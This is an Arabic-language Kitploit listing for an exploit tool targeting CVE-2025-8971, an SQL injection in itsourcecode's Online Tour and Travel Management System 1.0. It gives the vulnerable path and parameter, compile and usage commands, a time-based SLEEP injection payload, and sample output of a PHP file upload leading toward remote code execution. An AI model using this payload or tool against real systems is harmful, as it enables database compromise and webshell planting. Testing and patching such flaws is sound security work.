Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8971 — حقن SQL في نظام إدارة السياحة والسفر عبر الإنترنت itsourcecode الإصدار 1.0. | Kitploit
أدوات/GitHubGitHub/bytereaper77/cve-2025-8971
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقArchived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

حقن SQL في نظام إدارة السياحة والسفر عبر الإنترنت itsourcecode الإصدار 1.0.

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-8971 (حقن SQL)

المؤلف: Byte Reaper

الوصف :

هذا الاستغلال لـ CVE-2025-8971، ثغرة حقن SQL في نظام إدارة الجولات والسفر عبر الإنترنت itsourcecode الإصدار 1.0. توجد الثغرة في /admin/operations/travellers.php ويمكن استغلالها عن بُعد عبر معامل val-username.

كيفية العمل

يرسل الاستغلال طلبات HTTP POST مصممة إلى الرابط المستهدف.

يتم ترميز الحمولات وحقنها في val-username.

يمكن استخدام رفع ملف اختياري (.php أو صورة) لتحقيق تنفيذ تعليمات برمجية عن بُعد.

يتحقق السكربت من الاستجابات للتحقق من نجاح تنفيذ الحمولة.

المتطلبات :

root@kitploit:~
GCC compiler (gcc)

Linux x86_64 

ibcurl 

التجميع :

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]

الاستخدام:

root@kitploit:~
    -h, --help            help message 
    -u, --url             Target Url (BASE URL)
    -c, --cookies         File cookies
    -i, --ip              Fake Ip (Host request)
    -f, --file            File upload (.php / image)
    -v, --verbose         Verbose Mode

مثال تشغيل :

root@kitploit:~
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....

الترخيص :

ترخيص MIT

تنزيل الأداة